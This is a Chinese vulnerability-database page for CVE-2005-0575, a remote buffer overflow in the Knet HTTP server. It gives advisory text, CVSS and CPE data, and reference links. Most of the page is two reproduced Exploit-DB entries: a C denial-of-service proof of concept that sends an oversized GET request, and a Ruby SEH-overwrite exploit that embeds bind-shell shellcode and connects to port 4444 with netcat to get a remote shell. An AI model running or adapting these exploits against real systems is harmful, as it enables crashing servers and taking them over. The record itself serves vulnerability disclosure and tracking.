CVE-2005-0575
CVSS7.5
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:12:52
NMCOE    

[原文]Buffer overflow in Stormy Studios Knet 1.04c and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long HTTP GET request.


[CNNVD]Knet远程缓冲区溢出漏洞(CNNVD-200505-130)

        Knet是一款简易的WEB服务程序。
        Knet对GET请求缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。提交超过522字节的GET请求给Knet程序,可导致程序崩溃,精心构建提交数据可能以进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:stormy_studios:knet:1.4c
cpe:/a:stormy_studios:knet:1.0
cpe:/a:stormy_studios:knet:1.2
cpe:/a:stormy_studios:knet:1.3
cpe:/a:stormy_studios:knet:1.4b

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0575
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0575
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-130
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110943766505666&w=2
(UNKNOWN)  BUGTRAQ  20050225 Knet <= 1.04c Buffer Overflow Bug
http://www.exploit-db.com/exploits/24897
(UNKNOWN)  EXPLOIT-DB  24897
http://www.exploit-db.com/exploits/24950
(UNKNOWN)  EXPLOIT-DB  24950
http://www.securityfocus.com/bid/12671
(UNKNOWN)  BID  12671

- 漏洞信息

Knet远程缓冲区溢出漏洞
高危 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        Knet是一款简易的WEB服务程序。
        Knet对GET请求缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。提交超过522字节的GET请求给Knet程序,可导致程序崩溃,精心构建提交数据可能以进程权限在系统上执行任意指令。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.stormystudios.com/" target="_blank

- 漏洞信息 (843)

Knet <= 1.04c Buffer Overflow Denial of Service Exploit (EDBID:843)
windows dos
2005-02-25 Verified
0 CorryL
N/A [点击下载]
-=[--------------------ADVISORY-------------------]=-
-=[
    ]=-
-=[     Knet <= 1.04c                                                  ]=-
-=[
    ]=-
-=[  Author: CorryL  [corryl80@gmail.com]                ]=-
-=[                                  x0n3-h4ck.org                     ]=-
-=[----------------------------------------------------]=-

-=[+] Application:    Knet
-=[+] Version:        1.04c
-=[+] Vendor's URL:   www.stormystudios.com
-=[+] Platform:       Windows
-=[+] Bug type:       Buffer overflow
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:         CorryL  ~ CorryL[at]gmail[dot]com ~
-=[+] Reference:      www.x0n3-h4ck.org

..::[ Descriprion ]::..

Knet is an small http server,easy installation and use.

..::[ Bug ]::..

This software is affected a Buffer Overflow.
A malitious attacker sending the request GET AAAAAA..... to 522,
this cause the overwrite of the eip registry,causing the execution of
malicious code.

..::[ Proof Of Concept ]::..

GET AAAAAAAAAAAAAAAAAAAAAAAAAA......... to 522 byte long

..::[ Exploit ]::..

/*

     KNet <= 1.04c is affected to a remote buffer overflow in GET command.
  This PoC demostrate the vulnerability.

     KNet <= 1.04c     PoC Denial Of Service       Coded by: Expanders

     Usage:  ./x0n3-h4ck_Knet-DoS.c <Host> <Port>

*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void help(char *program_name);

int main(int argc, char *argv[]) {

   struct sockaddr_in trg;
   struct hostent *he;
long addr;
   int sockfd, buff,rc;
char evilbuf[1024];
char buffer[1024];
char *request;
if(argc < 3 ) {
 help(argv[0]);
 exit(0);
}
printf("\n\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\n");
   he = gethostbyname(argv[1]);
   sockfd = socket(AF_INET, SOCK_STREAM, 0);
request = (char *) malloc(12344);
   trg.sin_family = AF_INET;
   trg.sin_port = htons(atoi(argv[2]));
   trg.sin_addr = *((struct in_addr *) he->h_addr);
   memset(&(trg.sin_zero), '\0', 8);
printf("\n\nConnecting to target \t...");
rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
if(rc==0)
{
 printf("[Done]\nBuilding evil buffer\t...");
 memset(evilbuf,90,1023);
 printf("[Done]\nSending evil request   \t...");
 sprintf(request,"GET %s \n\r\n\r",evilbuf);
 send(sockfd,request,strlen(request),0);
 printf("[Done]\n\n[Finished] Check the server now\n");
}
else
 printf("[Fail] -> Unable to connect\n\n");
close(sockfd);
return 0;

}

void help(char *program_name) {

printf("\n\t-=[      KNet <= 1.04b PoC Denial Of Service      ]=-\n");
printf("\t-=[                                                    ]=-\n");
printf("\t-=[      Coded by ders -/www.x0n3-h4ck.org\\-      ]=-\n\n");
printf("Usage: %s <Host> <Port>\n",program_name);
}

// milw0rm.com [2005-02-25]
		

- 漏洞信息 (24897)

KNet Web Server 1.04b - Buffer Overflow SEH (EDBID:24897)
windows remote
2013-03-29 Verified
0 Myo Soe
[点击下载] [点击下载]
#!/usr/bin/ruby

# Exploit Title: KNet Web Server Buffer Overflow SEH
# Date: 2013-03-27
# Exploit Author: Myo Soe, http://yehg.net/
# Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html
# Version: KNet 1.04b 
# Tested on: Windows 7

require 'net/http'
require 'uri'
require 'socket'
############################################

# bind port 4444
sc_bind = 
"\xbd\x0e\x27\x05\xab\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x56\x83\xc2\x04\x31\x6a\x0f\x03\x6a\x01\xc5\xf0\x57" +
"\xf5\x80\xfb\xa7\x05\xf3\x72\x42\x34\x21\xe0\x06\x64\xf5" +
"\x62\x4a\x84\x7e\x26\x7f\x1f\xf2\xef\x70\xa8\xb9\xc9\xbf" +
"\x29\x0c\xd6\x6c\xe9\x0e\xaa\x6e\x3d\xf1\x93\xa0\x30\xf0" +
"\xd4\xdd\xba\xa0\x8d\xaa\x68\x55\xb9\xef\xb0\x54\x6d\x64" +
"\x88\x2e\x08\xbb\x7c\x85\x13\xec\x2c\x92\x5c\x14\x47\xfc" +
"\x7c\x25\x84\x1e\x40\x6c\xa1\xd5\x32\x6f\x63\x24\xba\x41" +
"\x4b\xeb\x85\x6d\x46\xf5\xc2\x4a\xb8\x80\x38\xa9\x45\x93" +
"\xfa\xd3\x91\x16\x1f\x73\x52\x80\xfb\x85\xb7\x57\x8f\x8a" +
"\x7c\x13\xd7\x8e\x83\xf0\x63\xaa\x08\xf7\xa3\x3a\x4a\xdc" +
"\x67\x66\x09\x7d\x31\xc2\xfc\x82\x21\xaa\xa1\x26\x29\x59" +
"\xb6\x51\x70\x36\x7b\x6c\x8b\xc6\x13\xe7\xf8\xf4\xbc\x53" +
"\x97\xb4\x35\x7a\x60\xba\x6c\x3a\xfe\x45\x8e\x3b\xd6\x81" +
"\xda\x6b\x40\x23\x62\xe0\x90\xcc\xb7\xa7\xc0\x62\x67\x08" +
"\xb1\xc2\xd7\xe0\xdb\xcc\x08\x10\xe4\x06\x3f\x16\x2a\x72" +
"\x6c\xf1\x4f\x84\x83\x5d\xd9\x62\xc9\x4d\x8f\x3d\x65\xac" +
"\xf4\xf5\x12\xcf\xde\xa9\x8b\x47\x56\xa4\x0b\x67\x67\xe2" +
"\x38\xc4\xcf\x65\xca\x06\xd4\x94\xcd\x02\x7c\xde\xf6\xc5" +
"\xf6\x8e\xb5\x74\x06\x9b\x2d\x14\x95\x40\xad\x53\x86\xde" +
"\xfa\x34\x78\x17\x6e\xa9\x23\x81\x8c\x30\xb5\xea\x14\xef" +
"\x06\xf4\x95\x62\x32\xd2\x85\xba\xbb\x5e\xf1\x12\xea\x08" +
"\xaf\xd4\x44\xfb\x19\x8f\x3b\x55\xcd\x56\x70\x66\x8b\x56" +
"\x5d\x10\x73\xe6\x08\x65\x8c\xc7\xdc\x61\xf5\x35\x7d\x8d" +
"\x2c\xfe\x8d\xc4\x6c\x57\x06\x81\xe5\xe5\x4b\x32\xd0\x2a" +
"\x72\xb1\xd0\xd2\x81\xa9\x91\xd7\xce\x6d\x4a\xaa\x5f\x18" +
"\x6c\x19\x5f\x09"

###########################################


sploit = "\x90" * 1234
sploit += "\xFF\x64\x24\x5C"  # nseh | JMP [ESP+5C] FF6424 5C ; will jump to Shell Code  at ESP+5C
sploit += "\xE3\x74\x24\x6C"  # seh  | Found pop esi - pop ebp - ret at 0x6C2474E3 [crtdll.dll]
sploit += "\x90" * 80  

sploit += sc_bind
sploit += "\x90" * 80

########################################

puts "KNet Web Server - Buffer Overflow SEH Exploit\r\n by Myo Soe, http://yehg.net/\n\n"
target = ARGV[0]

def exploit(t,s)
	target = 'http://' + t
	sploit = s
	puts "[*] Sending exploit to #{target}...\n"
	url = URI.parse(target)
	res = Net::HTTP.start(url.host, url.port) {|http|
	http.get('/' + sploit)
	}
end 
def connect(t)
	sleep(1)
	target = t
	puts "[*] Opening Shell ..\n\n";
	system("nc #{target} 4444")
end 
t1=Thread.new{exploit(target,sploit)}
t2=Thread.new{connect(target)}
t1.join
t2.join


		

- 漏洞信息

14239
Stormy Studios KNet HTTP GET Request Handling Remote Buffer Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

Stormy Studios KNet contains an overflow condition that is triggered as user-supplied input is not properly validated when handling HTTP GET requests. With a specially crafted request, a remote attacker can cause a stack-based buffer overflow, allowing the execution of arbitrary code.

- 时间线

2005-02-25 Unknow
2013-03-29 Unknow

- 解决方案

OSVDB is not currently aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站